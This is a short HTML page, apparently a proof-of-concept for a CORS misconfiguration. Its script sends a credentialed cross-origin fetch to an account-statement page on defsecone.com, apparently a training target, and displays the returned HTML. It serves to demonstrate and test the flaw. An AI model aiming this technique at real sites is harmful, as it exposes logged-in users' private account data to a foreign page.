<html>
<head>
    <title>Cross-Origin Request</title>
    <style>
        body { font-family: Arial, sans-serif; margin: 20px; }
        h1 { color: #333; }
        table { width: 50%; border-collapse: collapse; margin: 20px 0; }
        th, td { padding: 10px; text-align: center; border: 1px solid #ddd; }
        tr:nth-child(even) { background-color: #f2f2f2; }
        .error { color: red; }
    </style>
</head>
<body>
    <h1>Cross-Origin Request Example</h1>
    
    <button onclick="getAccountDetails()">Get Account Details</button>
    
    <div id="result"></div>

    <script>
        // Function to make the cross-origin request
        function getAccountDetails() {
            // Use fetch with credentials to include cookies
            fetch('https://defsecone.com/accountstatement.php', {
                method: 'GET',
                credentials: 'include', // Ensure cookies are included in the request
            })
            .then(response => response.text())  // Use text() instead of json() if it's HTML
            .then(data => {
                // Display the response HTML content
                document.getElementById('result').innerHTML = data;
            })
            .catch(error => {
                // Handle error
                console.error('Error:', error);
                document.getElementById('result').innerHTML = "<p class='error'>There was an error with the request.</p>";
            });
        }
    </script>
</body>
</html>
